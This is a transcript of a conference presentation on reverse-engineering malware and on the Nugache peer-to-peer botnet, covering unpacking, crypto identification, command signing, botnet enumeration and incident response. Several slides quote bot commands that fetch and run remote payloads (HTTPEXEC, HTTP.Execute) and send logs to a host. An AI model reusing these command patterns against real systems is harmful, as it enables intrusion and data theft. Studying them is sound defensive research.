1 / 46

Understanding Emerging Threats: The case of Nugache

David Dittrich University of Washington Bruce Dang Microsoft Corporation. Understanding Emerging Threats: The case of Nugache. Outline. Practical Techniques for Reverse Engineering Comparison of Distributed Intruder Tools Networks & Evolution of features/tactics Nugache - New P2P malware

dasha
Download Presentation

Understanding Emerging Threats: The case of Nugache

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. David DittrichUniversity of WashingtonBruce Dang Microsoft Corporation Understanding Emerging Threats: The case of Nugache

  2. Outline • Practical Techniques for Reverse Engineering • Comparison of Distributed Intruder Tools Networks & Evolution of features/tactics • Nugache - New P2P malware • Response Implications • Conclusions

  3. Practical techniques Packing, unpacking, identifying crypto, and patching (applied to Nugache)

  4. Agenda Packing Generic unpacking techniques Recognizing “important” functions Identifying cryptographic mechanisms (with and without scripts). Patching and dynamic analysis

  5. Packing • strings(1) does not work well  • Hinders static analysis • Dynamic analysis is a bit harder • Anti-debugging mechanisms (that you have not identified) • Cannot set breakpoints wisely • Creates anger

  6. Generic unpacking methods • The packed regions must be loaded, decrypted or decompressed, and executed. • (most of the time) Implies mov reg, [mem], loop, jmp / call reg/mem (read, unpack loop, write, execute) • Identify where these operations are happening. • (1) You can be lazy and just look for jmp/call reg, jmp/call [reg], jmp imm • (2) Memory breakpoints on write/execute regions. • (3) “guess” what library calls might be made and set a global breakpoint there (i.e., socket(), gethostbyname(), connect(), etc.) • (4) One instruction at a time …

  7. Recognizing “important” functions Familiarize yourself with common call chains and function relationship: socket, gethostbyname, connect, send, recv, close; CreateFile, ReadFile, WriteFile, CloseHandle, … Example: functions where send/recv occurs are typically dealing with network data; hence, they will be processing important buffers. Give friendly names and use cross-reference to your advantage. If they use encryption, they will need to encrypt the buffer before passing it to send; hence, trace backwards to where it was created and give it a friendly name “XXX_encrypt_buffer.” The same applies for recv Use cross-reference on strings because they usually give important clues about the function itself. “NICK %s” + “JOIN %s” -> probably IRC handler. “200 Command okay” + “212 Directory status” -> probably FTP handler. Identify a KNOWN function, then use cross-reference to trace backwards and give it a meaningful name.

  8. Code is usually written by humans so you can understand it too …

  9. Identifying cryptographic mechanisms • WITH scripts • findcrypt (IDA and OllyDBG) • Krypto Kanal (PEID) • WITHOUT scripts • (symmetric) Identify S-box values (a huge array of integers section). Use cross-reference on the array and give it a friendly name. Repeat until it makes sense. Matrix operations. Setkey -> encrypt • (asymmetric) Identify common public exponents (65535, 31337) and big integer multiplication. • (hash) HUGE functions which only consist of mov and arithmetic instructions. Think of common call chains: MD5Init -> MD5Update -> MD5Final. I wrote an IDA script to do this. • PRNG – no generic way.. Identify common seeders, GetTickCount(), GetCursorPos(), routines with lower/upper bounds arguments, time(NULL), XREFs against functions that you suspect to use PRNG (i.e., random email/contact, …)

  10. Patching and dynamic analysis Identify the important routines you want to patch. Good targets are ones that do the encryption/decryption. There are several ways you can to do it. Easiest patching method: write your logging function in a padding zone, carve out 5 bytes for a long JMP to the padding zone, JMP back and resume execution.

  11. To Sum Up • Reverse engineering is non-trivial, but is a critical skill for agile response • Static and dynamic analysis techniques complement each other (especially with C++) • RE is under-appreciated as a Software Engineering discipline • What can you learn from RE? (we move on…)

  12. Comparison of Distributed Intruder Tool Networks • Command and control (C2) Structures for Distributed Malware • Code reuse/feature convergence • Tactical convergence and advances in attack methodologies

  13. Command & Control (C2) Structures • Handler/Agent • IRC Botnet • Peer to Peer Command and control structures in malware: From Handler/Agent to P2P, by Dave Dittrich and Sven Dietrich, USENIX ;login: vol. 32, no. 6, December 2007, pp. 8-17

  14. Propagation mechanisms TechnicalExploits • Exploitation of remotely accessible vulnerabilities in the Windows LSASS (139/tcp) and RPC-DCOM (445/tcp) services • Email to targets obtained from WAB except those containing specific substrings (e.g., “icrosof”, “buse”, “secur”, “dmin”, “.gov”, “.mil”, etc.) • Messaging AIM and MSN buddy list members with randomly formed sentence and URL • Trojan Horse dropper associated with “celebrity video clips” • Trojan Horse SETUP.EXE on free download site SocialEngineering

  15. Nugache P2P bot • Features • Analysis and Observations • April 30, 2006 through today • pcap (full packet), p0f, Snort • Collection using Honeynet Project’s Honeywall (versions roo-1.0.194 and roo-1.1-RC-2)

  16. Features • Successful P2P C&C • Original on 8/tcp (now on random high-numbered ports) • All C2 over P2P channel (including updates) • Advanced use of crypto • RSA key exchange • Rijndael-256-OFB (w/per-session symmetric keys) • Signed commands and binary (4096 bit key) • Feature-rich, OO shell command set • Exposes only a limited subset of peers to traffic analysis

  17. Feature Comparison Analysis of the Storm and Nugache Trojans: P2P is here, Sam Stover, Dave Dittrich, John Hernandez, and Sven Dietrich, USENIX ;login: vol. 32, no. 6, December 2007, pp. 18-27

  18. Analysis and Observations • AV • Network traffic analysis • Propagation and DDoS activity

  19. AV Scan Results (Dec. 2006)

  20. Unique IP Addresses Seen

  21. Seven Days in the Life…

  22. Example of use (from IRC) 2006/05/19 01:04 GMT #ch4nn3l :scan:exploit,lsass #ch4nn3l :scan:payload,HTTPEXEC,http://www.[……..].com/files/a.exe #ch4nn3l :scan:start,3000 #ch4nn3l :scan:target,add,192.168.0.* #ch4nn3l :scan:target,add,192.168.1.* #ch4nn3l :scan:target,add,192.168.100.* #ch4nn3l :scan:target,add,R5000 #ch4nn3l :scan:target,current #ch4nn3l :spaim:10 Replies: :LSASS Operating system (192.168.1.121) is WinXP [213 times] :Sent execute to AIM_USER_NICK [103 times]

  23. IRC Bots vs. 8/tcp Peers

  24. Propagation Events

  25. Social Engineered Trojan Dropper Attack

  26. Indirect Propagation

  27. Download site (Counts from Site 2,not site shown here.)

  28. Features • C&C comms heavily encrypted “1<CR><LF>”

  29. Command Examples • Discrete commandsAIM.Spread(10);Scripts.AbortAll(); • Loopingwhile(1){HTTP.Visit("http://www.example.com/target.php", 0);} • Logical operationsif(Rand(0,99)==0){Sleep(Rand(0, 16000000));Logs.Send("10.0.0.1", 80);}if(!PVAR.IsSet("mail")){HTTP.Execute("http://bogus-site.com/addressgrabber.exe");PVAR.Set("mail", 1);} • Command sequencesScan.Targets.Clear();Scan.SetPayload("HTTPEXEC", "http://bogus-site.com/pwn.php");Scan.SetExploit("asn1smbnt");Scan.Targets.Add("R99999999");Scan.Start(20000);[some time later…]Scan.Pause();[some time later…]Scan.Start();[some time later…]Scan.Stop();

  30. Encryption/Signing of Commands • Command block10|3|22|AIM.Spread(10);|583E37091E7B8B7AFD8662485EFE7BF08DA3ACB63F611D46A329DD1CF86DB42A7FCD6616F2CAAEA728701FA8B71C782FAA48911DBF069E0091D914415320DD8624CFA982D23761C082BC88C037621473B3E518E6DD8C2E659E1A02EF2DA63C86C78853EF7868A3B92E4F7F8FB7DFB8BD9AF9F7ACB1A3AE7761A4E008B070B02793965FB4F1DBFA447FD871058F4893511BECAB27AB81B532B6143159EAB065798220A46864B0927E0A8D6F8C7C6D0FA396D23C33010F61054381531D5D166A4F08517064A2EECBA2A7671E35257247CB2D7F07DFBC6ADC3C7A3D2EB9DAEB29DAE79B9157657A70620DFF4CA7E827598EEF9D3CDC2B191DF6A2C0B1D33F95228C368BD2BE2A7E59D3223B898EA975C991057BEE002B9DA34A97F697F12832B7CBFEB786B438092FEEA362A10EC9E19602DD9D3F557014DC06DDD34EE5FD14C2D7DB16D9BE05E31DA862341F92464761443DE1E4865A867E5179998C386115890DBDDE3FF61B3E34B184C20B7B3155DF4D6C6C973B36FBAEC7A6A5D82A0C7C89ACB41BFB60497A3D3578701DEC096580098B756F9633D019109430E3804E127B4C924AAB0197171AB554642ED2E7B04019C70C5DF26BC4D2CA18C30AC990EBAFAA302C91F998C5556D513448FA357AA036A08B9F43A9A2A5EE1C2301F68A70BA8431ED808190D1AABCDE180F58E4DB13C17FECF47B8131304F96EA337E64FC5A|D027C867 • Signature block decrypted with embedded 4096-bit public key01FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00B55A34436A2A6AD7DA837A21BA58E5CC • Validation$ echo -n "AIM.Spread(10);D027C8673" | md5sumb55a34436a2a6ad7da837a21ba58e5cc -

  31. Enumeration Experiments • Queried all reachable bots for: • Connected peers (clients) • Known peers • Version, etc. • 90 samples • 160 hostsalways upand reachable

  32. Distribution of Bots by Country

  33. Enumeration Experiment #3

  34. Patch TuesdayEffect

  35. Comparison w/Storm Source: Thorsten Holtz’ “Honeyblog”http://honeyblog.org/uploads/stuff/storm/storm-growth.png Source: Brandon Enrighthttp://noh.ucsd.edu/~bmenrigh/exposing_storm.ppt

  36. Actualstructure? Rotavirushttp://web.uct.ac.za/depts/mmi/stannard/rota.html

  37. Sub-graph(Degree 9+)

  38. Sub-graph(Degree 10)

  39. ComparisonwithGnutella Source: “Visualizing Large and Dynamic Communication Networks,”http://www.nikolaus-kuehn.de/downloads/TelecoNetworkVisualization.pdf

  40. Response Implications • Decreased visibility => More survivability • Harder to stop, harder to trace back • Expertise needed to infiltrate new botnets • Cooperative, collaborative, and optimized response needed

  41. DDoS victims: Collect all source IPs (and whatever else you can collect) Sites w/attack peers: Collect full packet data ASAP Honeywall useful at LAN level to collect data, minimize potential for harm Ensure log times are complete and accurate Record IP DNS mappings (and time!) Put data collection at equal priority with takedown Operations Considerations

  42. Conclusions • Response is about to get a LOT harder • C&C less important; identifying peer connections more important • Experts (w/reverse engineers) must be engaged early • Collaborative/cooperative response will become essential (lots of opportunities to optimize) • There is much research left to do…

  43. Thanks and questions • Help from: Sven Dietrich (Stevens Institute of Technology), John Hernandez (UW Tacoma), Sam Stover (iSIGHT Partners), “others” • Contacts:Bruce DangMicrosoftbda(at)microsoft.comDave DittrichUniversity of Washingtondittrich(at)u.washington.eduhttp://staff.washington.edu/dittrich/ http://vig.prenhall.com/catalog/academic/product/0,1144,0131475738,00.html

More Related